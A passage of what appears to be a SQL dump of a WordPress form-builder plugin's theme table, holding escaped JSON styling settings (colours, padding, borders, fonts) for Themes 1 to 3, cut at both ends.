0\",\"HPMargin\":\"\",\"HPTextAlign\":\"center\",\"HPBorderColor\":\"#fffbfb\",\"HPBorderType\":\"solid\",\"HPBorderWidth\":\"1\",\"HPBorderRadius\":\"0\",\"HTPFontSize\":\"24\",\"HTPWeight\":\"bold\",\"HTPColor\":\"#ffffff\",\"HDPFontSize\":\"16\",\"HDPColor\":\"#131514\",\"HIPAlign\":\"top\",\"HIPWidth\":\"80\",\"HIPHeight\":\"\",\"GPBGColor\":\"\",\"GPFontSize\":\"23\",\"GPFontWeight\":\"normal\",\"GPWidth\":\"110\",\"GTPWidth\":\"60\",\"GPAlign\":\"left\",\"GPBackground\":\"\",\"GPBackgroundRepeat\":\"no-repeat\",\"GPBGPosition1\":\"\",\"GPBGPosition2\":\"\",\"GPBGSize1\":\"\",\"GPBGSize2\":\"\",\"GPColor\":\"#121414\",\"GPPadding\":\"10px\",\"GPMargin\":\"\",\"GPBorderColor\":\"#ffffff\",\"GPBorderType\":\"solid\",\"GPBorderWidth\":\"1\",\"GPBorderRadius\":\"0\",\"GPMLFontSize\":\"17\",\"GPMLFontWeight\":\"normal\",\"GPMLColor\":\"#000000\",\"GPMLPadding\":\"0px 5px 0px 0px\",\"GPMLMargin\":\"0px\",\"SEPBGColor\":\"\",\"SEPPadding\":\"\",\"SEPMargin\":\"\",\"COPPadding\":\"15px 20px\",\"COPMargin\":\"0px\",\"FPWidth\":\"70\",\"FPPadding\":\"15px 0 0 0\",\"FPMargin\":\"0 auto\",\"IPHeight\":\"26\",\"IPFontSize\":\"16\",\"IPFontWeight\":\"normal\",\"IPBGColor\":\"#ffffff\",\"IPColor\":\"#868686\",\"IPPadding\":\"0px 5px\",\"IPMargin\":\"0px\",\"IPBorderTop\":\"top\",\"IPBorderRight\":\"right\",\"IPBorderBottom\":\"bottom\",\"IPBorderLeft\":\"left\",\"IPBorderColor\":\"#dfdfdf\",\"IPBorderType\":\"solid\",\"IPBorderWidth\":\"1\",\"IPBorderRadius\":\"0\",\"IPBoxShadow\":\"\",\"SBPAppearance\":\"none\",\"SBPBackground\":\"images/themes/drop-downs/2.png\",\"SBPBGRepeat\":\"no-repeat\",\"SBPBGPos1\":\"95%\",\"SBPBGPos2\":\"50%\",\"SBPBGSize1\":\"8%\",\"SBPBGSize2\":\"32%\",\"SCPBGColor\":\"#ffffff\",\"SCPWidth\":\"16\",\"SCPHeight\":\"16\",\"SCPBorderTop\":\"top\",\"SCPBorderRight\":\"right\",\"SCPBorderBottom\":\"bottom\",\"SCPBorderLeft\":\"left\",\"SCPBorderColor\":\"#868686\",\"SCPBorderType\":\"solid\",\"SCPBorderWidth\":\"1\",\"SCPMargin\":\"0px 3px\",\"SCPBorderRadius\":\"15\",\"SCPBoxShadow\":\"\",\"SCCPBGColor\":\"#868686\",\"SCCPWidth\":\"6\",\"SCCPHeight\":\"6\",\"SCCPMargin\":\"5\",\"SCCPBorderRadius\":\"10\",\"MCPBGColor\":\"#ffffff\",\"MCPWidth\":\"16\",\"MCPHeight\":\"16\",\"MCPBorderTop\":\"top\",\"MCPBorderRight\":\"right\",\"MCPBorderBottom\":\"bottom\",\"MCPBorderLeft\":\"left\",\"MCPBorderColor\":\"#868686\",\"MCPBorderType\":\"solid\",\"MCPBorderWidth\":\"1\",\"MCPMargin\":\"0px 3px\",\"MCPBorderRadius\":\"0\",\"MCPBoxShadow\":\"\",\"MCCPBGColor\":\"\",\"MCCPBackground\":\"images/themes/checkboxes/1.png\",\"MCCPBGRepeat\":\"no-repeat\",\"MCCPBGPos1\":\"\",\"MCCPBGPos2\":\"\",\"MCCPWidth\":\"16\",\"MCCPHeight\":\"16\",\"MCCPMargin\":\"0\",\"MCCPBorderRadius\":\"0\",\"SPAlign\":\"left\",\"SPBGColor\":\"#e74c3c\",\"SPWidth\":\"\",\"SPHeight\":\"\",\"SPFontSize\":\"16\",\"SPFontWeight\":\"normal\",\"SPColor\":\"#ffffff\",\"SPPadding\":\"5px 8px\",\"SPMargin\":\"0 15px 0 0\",\"SPBorderTop\":\"top\",\"SPBorderRight\":\"right\",\"SPBorderBottom\":\"bottom\",\"SPBorderLeft\":\"left\",\"SPBorderColor\":\"#e74c3c\",\"SPBorderType\":\"solid\",\"SPBorderWidth\":\"1\",\"SPBorderRadius\":\"0\",\"SPBoxShadow\":\"\",\"SHPBGColor\":\"#701e16\",\"SHPColor\":\"#ffffff\",\"SHPBorderTop\":\"top\",\"SHPBorderRight\":\"right\",\"SHPBorderBottom\":\"bottom\",\"SHPBorderLeft\":\"left\",\"SHPBorderColor\":\"#701e16\",\"SHPBorderType\":\"solid\",\"SHPBorderWidth\":\"1\",\"BPBGColor\":\"#96afab\",\"BPWidth\":\"\",\"BPHeight\":\"\",\"BPFontSize\":\"16\",\"BPFontWeight\":\"normal\",\"BPColor\":\"#ffffff\",\"BPPadding\":\"5px 8px\",\"BPMargin\":\"0 15px 0 0\",\"BPBorderTop\":\"top\",\"BPBorderRight\":\"right\",\"BPBorderBottom\":\"bottom\",\"BPBorderLeft\":\"left\",\"BPBorderColor\":\"#8a8a8a\",\"BPBorderType\":\"solid\",\"BPBorderWidth\":\"1\",\"BPBorderRadius\":\"0\",\"BPBoxShadow\":\"\",\"BHPBGColor\":\"#5a7784\",\"BHPColor\":\"#ffffff\",\"BHPBorderTop\":\"top\",\"BHPBorderRight\":\"right\",\"BHPBorderBottom\":\"bottom\",\"BHPBorderLeft\":\"left\",\"BHPBorderColor\":\"#5a7784\",\"BHPBorderType\":\"solid\",\"BHPBorderWidth\":\"1\",\"PSAPBGColor\":\"#e74c3c\",\"PSAPFontSize\":\"16\",\"PSAPFontWeight\":\"normal\",\"PSAPColor\":\"#ffffff\",\"PSAPHeight\":\"\",\"PSAPLineHeight\":\"\",\"PSAPPadding\":\"6px\",\"PSAPMargin\":\"0 1px 0 0 \",\"PSAPBorderTop\":\"top\",\"PSAPBorderRight\":\"right\",\"PSAPBorderBottom\":\"bottom\",\"PSAPBorderLeft\":\"left\",\"PSAPBorderColor\":\"#e74c3c\",\"PSAPBorderType\":\"solid\",\"PSAPBorderWidth\":\"2\",\"PSAPBorderRadius\":\"0\",\"PSDPBGColor\":\"#ededed\",\"PSDPFontSize\":\"14\",\"PSDPFontWeight\":\"normal\",\"PSDPColor\":\"#737373\",\"PSDPHeight\":\"\",\"PSDPLineHeight\":\"\",\"PSDPPadding\":\"3px 5px\",\"PSDPMargin\":\"0 1px 0 0 \",\"PSDPBorderTop\":\"top\",\"PSDPBorderRight\":\"right\",\"PSDPBorderBottom\":\"bottom\",\"PSDPBorderLeft\":\"left\",\"PSDPBorderColor\":\"#ededed\",\"PSDPBorderType\":\"solid\",\"PSDPBorderWidth\":\"2\",\"PSDPBorderRadius\":\"0\",\"PSAPAlign\":\"right\",\"PSAPWidth\":\"\",\"PPAPWidth\":\"100%\",\"NBPBGColor\":\"\",\"NBPWidth\":\"\",\"NBPHeight\":\"\",\"NBPLineHeight\":\"\",\"NBPColor\":\"#607370\",\"NBPPadding\":\"4px 10px\",\"NBPMargin\":\"0px\",\"NBPBorderColor\":\"#777777\",\"NBPBorderType\":\"solid\",\"NBPBorderWidth\":\"1\",\"NBPBorderRadius\":\"0\",\"NBPBoxShadow\":\"\",\"NBHPBGColor\":\"\",\"NBHPColor\":\"#3369fb\",\"NBHPBorderColor\":\"#f6e2f4\",\"NBHPBorderType\":\"solid\",\"NBHPBorderWidth\":\"1\",\"PBPBGColor\":\"\",\"PBPWidth\":\"100\",\"PBPHeight\":\"\",\"PBPLineHeight\":\"\",\"PBPColor\":\"#607370\",\"PBPPadding\":\"\",\"PBPMargin\":\"0px\",\"PBPBorderColor\":\"#777777\",\"PBPBorderType\":\"solid\",\"PBPBorderWidth\":\"1\",\"PBPBorderRadius\":\"0\",\"PBPBoxShadow\":\"\",\"PBHPBGColor\":\"\",\"PBHPColor\":\"#f3f8f7\",\"PBHPBorderColor\":\"#787878\",\"PBHPBorderType\":\"solid\",\"PBHPBorderWidth\":\"1\",\"CBPPosition\":\"absolute\",\"CBPTop\":\"10px\",\"CBPRight\":\"10px\",\"CBPBottom\":\"\",\"CBPLeft\":\"\",\"CBPBGColor\":\"\",\"CBPFontSize\":\"20\",\"CBPFontWeight\":\"normal\",\"CBPColor\":\"#777777\",\"CBPPadding\":\"0px\",\"CBPMargin\":\"0px\",\"CBPBorderColor\":\"#ffffff\",\"CBPBorderType\":\"solid\",\"CBPBorderWidth\":\"1\",\"CBPBorderRadius\":\"0\",\"CBHPBGColor\":\"\",\"CBHPColor\":\"#e74c3c\",\"CBHPBorderColor\":\"#737373\",\"CBHPBorderType\":\"solid\",\"CBHPBorderWidth\":\"1\",\"MBPBGColor\":\"#96afab\",\"MBPFontSize\":\"17\",\"MBPFontWeight\":\"normal\",\"MBPColor\":\"#ffffff\",\"MBPTextAlign\":\"center\",\"MBPPadding\":\"10px\",\"MBPMargin\":\"\",\"MBPBorderTop\":\"top\",\"MBPBorderRight\":\"right\",\"MBPBorderBottom\":\"bottom\",\"MBPBorderLeft\":\"left\",\"MBPBorderColor\":\"#96afab\",\"MBPBorderType\":\"solid\",\"MBPBorderWidth\":\"2\",\"MBPBorderRadius\":\"0\",\"MBHPBGColor\":\"#96afab\",\"MBHPColor\":\"#607370\",\"MBHPBorderTop\":\"top\",\"MBHPBorderRight\":\"right\",\"MBHPBorderBottom\":\"bottom\",\"MBHPBorderLeft\":\"left\",\"MBHPBorderColor\":\"#96afab\",\"MBHPBorderType\":\"solid\",\"MBHPBorderWidth\":\"2\",\"OPDeInputColor\":\"#afafaf\",\"OPFontStyle\":\"normal\",\"OPRColor\":\"#ff1313\",\"OPDPIcon\":\"images/themes/date-pickers/2.png\",\"OPDPRepeat\":\"no-repeat\",\"OPDPPos1\":\"0%\",\"OPDPPos2\":\"10%\",\"OPDPMargin\":\"3px 0 0 -23px\",\"OPFBgUrl\":\"images/themes/file-uploads/2.png\",\"OPFBGRepeat\":\"no-repeat\",\"OPFPos1\":\"0%\",\"OPFPos2\":\"10%\",\"OPGWidth\":\"100\",\"CUPCSS\":\"\"}',1,2),(2,'Theme 2','{\"nonce_fm\":\"bd4a1b7eed\",\"task\":\"\",\"params\":\"\",\"current_id\":\"2\",\"default\":\"0\",\"active_tab\":\"header\",\"title\":\"Theme 2\",\"GPFontFamily\":\"Roboto Condensed\",\"AGPWidth\":\"100\",\"AGPSPWidth\":\"30\",\"AGPPadding\":\"\",\"AGPMargin\":\"0 auto\",\"AGPBorderColor\":\"#ffffff\",\"AGPBorderType\":\"solid\",\"AGPBorderWidth\":\"1\",\"AGPBorderRadius\":\"0\",\"AGPBoxShadow\":\"\",\"HPAlign\":\"top\",\"HPBGColor\":\"#5abcf2\",\"HPWidth\":\"100\",\"HTPWidth\":\"40\",\"HPPadding\":\"15px 0\",\"HPMargin\":\"\",\"HPTextAlign\":\"center\",\"HPBorderColor\":\"#b7b7b7\",\"HPBorderType\":\"solid\",\"HPBorderWidth\":\"1\",\"HPBorderRadius\":\"0\",\"HTPFontSize\":\"25\",\"HTPWeight\":\"bold\",\"HTPColor\":\"#ffffff\",\"HDPFontSize\":\"17\",\"HDPColor\":\"#387185\",\"HIPAlign\":\"top\",\"HIPWidth\":\"80\",\"HIPHeight\":\"\",\"GPBGColor\":\"#ededed\",\"GPFontSize\":\"16\",\"GPFontWeight\":\"normal\",\"GPWidth\":\"100\",\"GTPWidth\":\"60\",\"GPAlign\":\"center\",\"GPBackground\":\"\",\"GPBackgroundRepeat\":\"no-repeat\",\"GPBGPosition1\":\"\",\"GPBGPosition2\":\"\",\"GPBGSize1\":\"\",\"GPBGSize2\":\"\",\"GPColor\":\"#387185\",\"GPPadding\":\"10px\",\"GPMargin\":\"\",\"GPBorderColor\":\"#ffffff\",\"GPBorderType\":\"solid\",\"GPBorderWidth\":\"1\",\"GPBorderRadius\":\"0\",\"GPMLFontSize\":\"14\",\"GPMLFontWeight\":\"normal\",\"GPMLColor\":\"#777777\",\"GPMLPadding\":\"0px 5px 0px 0px\",\"GPMLMargin\":\"0px\",\"SEPBGColor\":\"#ededed\",\"SEPPadding\":\"\",\"SEPMargin\":\"\",\"COPPadding\":\"10px\",\"COPMargin\":\"0px\",\"FPWidth\":\"70\",\"FPPadding\":\"15px 0 0 0\",\"FPMargin\":\"0 auto\",\"IPHeight\":\"26\",\"IPFontSize\":\"14\",\"IPFontWeight\":\"normal\",\"IPBGColor\":\"#ffffff\",\"IPColor\":\"#777777\",\"IPPadding\":\"0px 5px\",\"IPMargin\":\"0px\",\"IPBorderTop\":\"top\",\"IPBorderRight\":\"right\",\"IPBorderBottom\":\"bottom\",\"IPBorderLeft\":\"left\",\"IPBorderColor\":\"#dfdfdf\",\"IPBorderType\":\"solid\",\"IPBorderWidth\":\"1\",\"IPBorderRadius\":\"0\",\"IPBoxShadow\":\"\",\"SBPAppearance\":\"none\",\"SBPBackground\":\"images/themes/drop-downs/2.png\",\"SBPBGRepeat\":\"no-repeat\",\"SBPBGPos1\":\"95%\",\"SBPBGPos2\":\"50%\",\"SBPBGSize1\":\"8%\",\"SBPBGSize2\":\"32%\",\"SCPBGColor\":\"#ffffff\",\"SCPWidth\":\"16\",\"SCPHeight\":\"16\",\"SCPBorderTop\":\"top\",\"SCPBorderRight\":\"right\",\"SCPBorderBottom\":\"bottom\",\"SCPBorderLeft\":\"left\",\"SCPBorderColor\":\"#777777\",\"SCPBorderType\":\"solid\",\"SCPBorderWidth\":\"1\",\"SCPMargin\":\"0px 3px\",\"SCPBorderRadius\":\"15\",\"SCPBoxShadow\":\"\",\"SCCPBGColor\":\"#777777\",\"SCCPWidth\":\"6\",\"SCCPHeight\":\"6\",\"SCCPMargin\":\"5\",\"SCCPBorderRadius\":\"10\",\"MCPBGColor\":\"#ffffff\",\"MCPWidth\":\"16\",\"MCPHeight\":\"16\",\"MCPBorderTop\":\"top\",\"MCPBorderRight\":\"right\",\"MCPBorderBottom\":\"bottom\",\"MCPBorderLeft\":\"left\",\"MCPBorderColor\":\"#777777\",\"MCPBorderType\":\"solid\",\"MCPBorderWidth\":\"1\",\"MCPMargin\":\"0px 3px\",\"MCPBorderRadius\":\"0\",\"MCPBoxShadow\":\"\",\"MCCPBGColor\":\"\",\"MCCPBackground\":\"images/themes/checkboxes/1.png\",\"MCCPBGRepeat\":\"no-repeat\",\"MCCPBGPos1\":\"\",\"MCCPBGPos2\":\"\",\"MCCPWidth\":\"16\",\"MCCPHeight\":\"16\",\"MCCPMargin\":\"0\",\"MCCPBorderRadius\":\"0\",\"SPAlign\":\"right\",\"SPBGColor\":\"#a3aa44\",\"SPWidth\":\"\",\"SPHeight\":\"\",\"SPFontSize\":\"16\",\"SPFontWeight\":\"normal\",\"SPColor\":\"#ffffff\",\"SPPadding\":\"5px 8px\",\"SPMargin\":\"0 5px 0 0 \",\"SPBorderTop\":\"top\",\"SPBorderRight\":\"right\",\"SPBorderBottom\":\"bottom\",\"SPBorderLeft\":\"left\",\"SPBorderColor\":\"#a3aa44\",\"SPBorderType\":\"solid\",\"SPBorderWidth\":\"1\",\"SPBorderRadius\":\"0\",\"SPBoxShadow\":\"1px 1px 2px #ccc\",\"SHPBGColor\":\"#c2d852\",\"SHPColor\":\"#445d71\",\"SHPBorderTop\":\"top\",\"SHPBorderRight\":\"right\",\"SHPBorderBottom\":\"bottom\",\"SHPBorderLeft\":\"left\",\"SHPBorderColor\":\"#c2d852\",\"SHPBorderType\":\"solid\",\"SHPBorderWidth\":\"1\",\"BPBGColor\":\"#16afbf\",\"BPWidth\":\"\",\"BPHeight\":\"\",\"BPFontSize\":\"16\",\"BPFontWeight\":\"normal\",\"BPColor\":\"#ffffff\",\"BPPadding\":\"5px 8px\",\"BPMargin\":\"0 15px 0 0 \",\"BPBorderTop\":\"top\",\"BPBorderRight\":\"right\",\"BPBorderBottom\":\"bottom\",\"BPBorderLeft\":\"left\",\"BPBorderColor\":\"#16afbf\",\"BPBorderType\":\"solid\",\"BPBorderWidth\":\"1\",\"BPBorderRadius\":\"0\",\"BPBoxShadow\":\"1px 1px 2px #ccc\",\"BHPBGColor\":\"#435c71\",\"BHPColor\":\"#ffffff\",\"BHPBorderTop\":\"top\",\"BHPBorderRight\":\"right\",\"BHPBorderBottom\":\"bottom\",\"BHPBorderLeft\":\"left\",\"BHPBorderColor\":\"#435c71\",\"BHPBorderType\":\"solid\",\"BHPBorderWidth\":\"1\",\"PSAPBGColor\":\"#a3aa44\",\"PSAPFontSize\":\"16\",\"PSAPFontWeight\":\"normal\",\"PSAPColor\":\"#ffffff\",\"PSAPHeight\":\"\",\"PSAPLineHeight\":\"\",\"PSAPPadding\":\"8px\",\"PSAPMargin\":\"0 0 4px 0 \",\"PSAPBorderTop\":\"top\",\"PSAPBorderRight\":\"right\",\"PSAPBorderBottom\":\"bottom\",\"PSAPBorderLeft\":\"left\",\"PSAPBorderColor\":\"#a3aa44\",\"PSAPBorderType\":\"solid\",\"PSAPBorderWidth\":\"2\",\"PSAPBorderRadius\":\"3\",\"PSDPBGColor\":\"#16afbf\",\"PSDPFontSize\":\"16\",\"PSDPFontWeight\":\"normal\",\"PSDPColor\":\"#ffffff\",\"PSDPHeight\":\"\",\"PSDPLineHeight\":\"\",\"PSDPPadding\":\"4px 6px\",\"PSDPMargin\":\"0 0 0 -3px\",\"PSDPBorderTop\":\"top\",\"PSDPBorderRight\":\"right\",\"PSDPBorderBottom\":\"bottom\",\"PSDPBorderLeft\":\"left\",\"PSDPBorderColor\":\"#16afbf\",\"PSDPBorderType\":\"solid\",\"PSDPBorderWidth\":\"2\",\"PSDPBorderRadius\":\"3\",\"PSAPAlign\":\"right\",\"PSAPWidth\":\"\",\"PPAPWidth\":\"100%\",\"NBPBGColor\":\"\",\"NBPWidth\":\"\",\"NBPHeight\":\"\",\"NBPLineHeight\":\"\",\"NBPColor\":\"#16afbf\",\"NBPPadding\":\"4px 10px\",\"NBPMargin\":\"0px\",\"NBPBorderColor\":\"#777777\",\"NBPBorderType\":\"solid\",\"NBPBorderWidth\":\"1\",\"NBPBorderRadius\":\"0\",\"NBPBoxShadow\":\"\",\"NBHPBGColor\":\"\",\"NBHPColor\":\"#387185\",\"NBHPBorderColor\":\"#787878\",\"NBHPBorderType\":\"solid\",\"NBHPBorderWidth\":\"1\",\"PBPBGColor\":\"\",\"PBPWidth\":\"100\",\"PBPHeight\":\"\",\"PBPLineHeight\":\"\",\"PBPColor\":\"#9c9c9c\",\"PBPPadding\":\"\",\"PBPMargin\":\"0px\",\"PBPBorderColor\":\"#777777\",\"PBPBorderType\":\"solid\",\"PBPBorderWidth\":\"1\",\"PBPBorderRadius\":\"0\",\"PBPBoxShadow\":\"\",\"PBHPBGColor\":\"\",\"PBHPColor\":\"#2d4d5f\",\"PBHPBorderColor\":\"#787878\",\"PBHPBorderType\":\"solid\",\"PBHPBorderWidth\":\"1\",\"CBPPosition\":\"absolute\",\"CBPTop\":\"10px\",\"CBPRight\":\"10px\",\"CBPBottom\":\"\",\"CBPLeft\":\"\",\"CBPBGColor\":\"\",\"CBPFontSize\":\"22\",\"CBPFontWeight\":\"normal\",\"CBPColor\":\"#387185\",\"CBPPadding\":\"0px\",\"CBPMargin\":\"0px\",\"CBPBorderColor\":\"#ffffff\",\"CBPBorderType\":\"solid\",\"CBPBorderWidth\":\"1\",\"CBPBorderRadius\":\"0\",\"CBHPBGColor\":\"\",\"CBHPColor\":\"#a3aa44\",\"CBHPBorderColor\":\"#737373\",\"CBHPBorderType\":\"solid\",\"CBHPBorderWidth\":\"1\",\"MBPBGColor\":\"#16afbf\",\"MBPFontSize\":\"17\",\"MBPFontWeight\":\"normal\",\"MBPColor\":\"#ffffff\",\"MBPTextAlign\":\"center\",\"MBPPadding\":\"10px\",\"MBPMargin\":\"\",\"MBPBorderTop\":\"top\",\"MBPBorderRight\":\"right\",\"MBPBorderBottom\":\"bottom\",\"MBPBorderLeft\":\"left\",\"MBPBorderColor\":\"#387185\",\"MBPBorderType\":\"solid\",\"MBPBorderWidth\":\"2\",\"MBPBorderRadius\":\"0\",\"MBHPBGColor\":\"#ffffff\",\"MBHPColor\":\"#16afbf\",\"MBHPBorderTop\":\"top\",\"MBHPBorderRight\":\"right\",\"MBHPBorderBottom\":\"bottom\",\"MBHPBorderLeft\":\"left\",\"MBHPBorderColor\":\"#387185\",\"MBHPBorderType\":\"solid\",\"MBHPBorderWidth\":\"2\",\"OPDeInputColor\":\"#afafaf\",\"OPFontStyle\":\"normal\",\"OPRColor\":\"#ff1313\",\"OPDPIcon\":\"images/themes/date-pickers/2.png\",\"OPDPRepeat\":\"no-repeat\",\"OPDPPos1\":\"0%\",\"OPDPPos2\":\"10%\",\"OPDPMargin\":\"3px 0 0 -23px\",\"OPFBgUrl\":\"images/themes/file-uploads/2.png\",\"OPFBGRepeat\":\"no-repeat\",\"OPFPos1\":\"0%\",\"OPFPos2\":\"10%\",\"OPGWidth\":\"100\",\"CUPCSS\":\"\"}',0,2),(3,'Theme 3','{\"GPFontFamily\":\"Droid Sans\",\"AGPWidth\":\"80\",\"AGPSPWidth\":\"30\",\"AGPPadding\":\"\",\"AGPMargin\":\"0 auto\",\"AGPBorderColor\":\"#ffffff\",\"AGPBorderType\":\"solid\",\"AGPBorderWidth\":\"1\",\"AGPBorderRadius\":\"0\",\"AGPBoxShadow\":\"\",\"HPAlign\":\"top\",\"HPBGColor\":\"#b7b7b7\",\"HPWidth\":\"100\",\"HTPWidth\":\"35\",\"HPPadding\":\"10px 4px 25px\",\"HPMargin\":\"\",\"HPTextAlign\":\"center\",\"HPBorderColor\":\"#b7b7b7\",\"HPBorderType\":\"solid\",\"HPBorderWidth\":\"1\",\"HPBorderRadius\":\"0\",\"HTPFontSize\":\"25\",\"HTPWeight\":\"? string:? string:? string:? string:? string:? string:? string:? string:? string:? string:? string:? string:? string: ? ? ? ? ? ? ? ? ? ? ? ? ?\",\"HTPColor\":\"#ffffff\",\"HDPFontSize\":\"16\",\"HDPColor\":\"#354f5d\",\"HIPAlign\":\"top\",\"HIPWidth\":\"80\",\"HIPHeight\":\"\",\"GPBGColor\":\"#ededed\",\"GPFontSize\":\"16\",\"GPFontWeight\":\"normal\",\"GPWidth\":\"100\",\"GTPWidth\":\"65\",\"GPAlign\":\"center\",\"GPBackground\":\"\",\"GPBackgroundRepeat\":\"no-repeat\",\"GPBGPosition1\":\"\",\"GPBGPosition2\":\"\",\"GPBGSize1\":\"\",\"GPBGSize2\":\"\",\"GPColor\":\"#627781\",\"GPPadding\":\"10px\",\"GPMargin\":\"-25px 0 0 \",\"GPBorderColor\":\"#ffffff\",\"GPBorderType\":\"solid\",\"GPBorderWidth\":\"1\",\"GPBorderRadius\":\"0\",\"GPMLFontSize\":\"14\",\"GPMLFontWeight\":\"normal\",\"GPMLColor\":\"#bfbbbb\",\"GPMLPadding\":\"0px 5px 0px 0px\",\"GPMLMargin\":\"0px\",\"SEPBGColor\":\"#f3f3f3\",\"SEPPadding\":\"10px 15px\",\"SEPMargin\":\"\",\"COPPadding\":\"10px\",\"COPMargin\":\"0px\",\"FPWidth\":\"70\",\"FPPadding\":\"15px 0 0 0\",\"FPMargin\":\"0 auto\",\"IPHeight\":\"26\",\"IPFontSize\":\"14\",\"IPFontWeight\":\"normal\",\"IPBGColor\":\"#ffffff\",\"IPColor\":\"#bfbbbb\",\"IPPadding\":\"0px 5px\",\"IPMargin\":\"0px\",\"IPBorderTop\":\"top\",\"IPBorderRight\":\"right\",\"IPBorderBottom\":\"bottom\",\"IPBorderLeft\":\"left\",\"IPBorderColor\":\"#dfdfdf\",\"IPBorderType\":\"solid\",\"IPBorderWidth\":\"1\",\"IPBorderRadius\":\"0\",\"IPBoxShadow\":\"\",\"SBPAppearance\":\"none\",\"SBPBackground\":\"images/themes/drop-downs/2.png\",\"SBPBGRepeat\":\"no-repeat\",\"SBPBGPos1\":\"95%\",\"SBPBGPos2\":\"50%\",\"SBPBGSize1\":\"8%\",\"SBPBGSize2\":\"32%\",\"SCPBGColor\":\"#ffffff\",\"SCPWidth\":\"16\",\"SCPHeight\":\"16\",\"SCPBorderTop\":\"top\",\"SCPBorderRight\":\"right\",\"SCPBorderBottom\":\"bottom\",\"SCPBorderLeft\":\"left\",\"SCPBorderColor\":\"#bfbbbb\",\"SCPBorderType\":\"solid\",\"SCPBorderWidth\":\"1\",\"SCPMargin\":\"0px 3px\",\"SCPBorderRadius\":\"15\",\"SCPBoxShadow\":\"\",\"SCCPBGColor\":\"#777777\",\"SCCPWidth\":\"6\",\"SCCPHeight\":\"6\",\"SCCPMargin\":\"5\",\"SCCPBorderRadius\":\"10\",\"MCPBGColor\":\"#ffffff\",\"MCPWidth\":\"16\",\"MCPHeight\":\"16\",\"MCPBorderTop\":\"top\",\"MCPBorderRight\":\"right\",\"MCPBorderBottom\":\"bottom\",\"MCPBorderLeft\":\"left\",\"MCPBorderColor\":\"#bfbbbb\",\"MCPBorderType\":\"solid\",\"MCPBorderWidth\":\"1\",\"MCPMargin\":\"0px 3px\",\"MCPBorderRadius\":\"0\",\"MCPBoxShadow\":\"\",\"MCCPBGColor\":\"\",\"MCCPBackground\":\"images/themes/checkboxes/1.png\",\"MCCPBGRepeat\":\"no-repeat\",\"MCCPBGPos1\":\"\",\"MCCPBGPos2\":\"\",\"MCCPWidth\":\"16\",\"MCCPHeight\":\"16\",\"MCCPMargin\":\"0\",\"MCCPBorderRadius\":\"0\",\"SPAlign\":\"right\",\"SPBGColor\":\"#676767\",\"SPWidth\":\"\",\"SPHeight\":\"\",\"SPFontSize\":\"16\",\"SPFontWeight\":\"normal\",\"SPColor\":\"#ffffff\",\"SPPadding\":\"5px 8px\",\"SPMargin\":\"0px\",\"SPBorderTop\":\"top\",\"SPBorderRight\":\"right\",\"SPBorderBottom\":\"bottom\",\"SPBorderLeft\":\"left\",\"SPBorderColor\":\"#676767\",\"SPBorderType\":\"solid\",\"SPBorderWidth\":\"1\",\"SPBorderRadius\":\"0\",\"SPBoxShadow\":\"1px 1px 2px #ccc\",\"SHPBGColor\":\"#ededed\",\"SHPColor\":\"#676767\",\"SHPBorderTop\":\"top\",\"SHPBorderRight\":\"right\",\"SHPBorderBottom\":\"bottom\",\"SHPBorderLeft\":\"left\",\"SHPBorderColor\":\"#676767\",\"SHPBorderType\":\"solid\",\"SHPBorderWidth\":\"1\",\"BPBGColor\":\"#f3f3f3\",\"BPWidth\":\"\",\"BPHeight\":\"\",\"BPFontSize\":\"14\",\"BPFontWeight\":\"normal\",\"BPColor\":\"#777777\",\"BPPadding\":\"5px 8px\",\"BPMargin\":\"0px\",\"BPBorderTop\":\"top\",\"BPBorderRight\":\"right\",\"BPBorderBottom\":\"bottom\",\"BPBorderLeft\":\"left\",\"BPBorderColor\":\"#ededed\",\"BPBorderType\":\"solid\",\"BPBorderWidth\":\"1\",\"BPBorderRadius\":\"0\",\"BPBoxShadow\":\"1px 1px 2px #ccc\",\"BHPBGColor\":\"#ededed\",\"BHPColor\":\"#777777\",\"BHPBorderTop\":\"top\",\"BHPBorderRight\":\"right\",\"BHPBorderBottom\":\"bottom\",\"BHPBorderLeft\":\"left\",\"BHPBorderColor\":\"#ededed\",\"BHPBorderType\":\"solid\",\"BHPBorderWidth\":\"1\",\"PSAPBGColor\":\"#354f5d\",\"PSAPFontSize\":\"16\",\"PSAPFontWeight\":\"normal\",\"PSAPColor\":\"#ffffff\",\"PSAPHeight\":\"\",\"PSAPLineHeight\":\"\",\"PSAPPadding\":\"8px\",\"PSAPMargin\":\"0 0 4px 0 \",\"PSAPBorderTop\":\"top\",\"PSAPBorderRight\":\"right\",\"PSAPBorderBottom\":\"bottom\",\"PSAPBorderLeft\":\"left\",\"PSAPBorderColor\":\"#354f5d\",\"PSAPBorderType\":\"solid\",\"PSAPBorderWidth\":\"2\",\"PSAPBorderRadius\":\"3\",\"PSDPBGColor\":\"#b7b7b7\",\"PSDPFontSize\":\"16\",\"PSDPFontWeight\":\"normal\",\"PSDPColor\":\"#ffffff\",\"PSDPHeight\":\"\",\"PSDPLineHeight\":\"\",\"PSDPPadding\":\"4px 6px\",\"PSDPMargin\":\"0 0 0 -3px\",\"PSDPBorderTop\":\"top\",\"PSDPBorderRight\":\"right\",\"PSDPBorderBottom\":\"bottom\",\"PSDPBorderLeft\":\"left\",\"PSDPBorderColor\":\"#b7b7b7\",\"PSDPBorderType\":\"solid\",\"PSDPBorderWidth\":\"2\",\"PSDPBorderRadius\":\"3\",\"PSAPAlign\":\"right\",\"PSAPWidth\":\"\",\"PPAPWidth\":\"100%\",\"NBPBGColor\":\"\",\"NBPWidth\":\"\",\"NBPHeight\":\"\",\"NBPLineHeight\":\"\",\"NBPColor\":\"#838383\",\"NBPPadding\":\"4px 10px\",\"NBPMargin\":\"0px\",\"NBPBorderColor\":\"#777777\",\"NBPBorderType\":\"solid\",\"NBPBorderWidth\":\"1\",\"NBPBorderRadius\":\"0\",\"NBPBoxShadow\":\"\",\"NBHPBGColor\":\"\",\"NBHPColor\":\"#387185\",\"NBHPBorderColor\":\"#787878\",\"NBHPBorderType\":\"solid\",\"NBHPBorderWidth\":\"1\",\"PBPBGColor\":\"\",\"PBPWidth\":\"100\",\"PBPHeight\":\"\",\"PBPLineHeight\":\"\",\"PBPColor\":\"#9c9c9c\",\"PBPPadding\":\"\",\"PBPMargin\":\"0px\",\"PBPBorderColor\":\"#777777\",\"PBPBorderType\":\"solid\",\"PBPBorderWidth\":\"1\",\"PBPBorderRadius\":\"0\",\"PBPBoxShadow\":\"\",\"PBHPBGColor\":\"\",\"PBHPColor\":\"#2d4d5f\",\"PBHPBorderColor\":\"#787878\",\"PBHPBorderType\":\"solid\",\"PBHPBorderWidth\":\"1\",\"CBPPosition\":\"a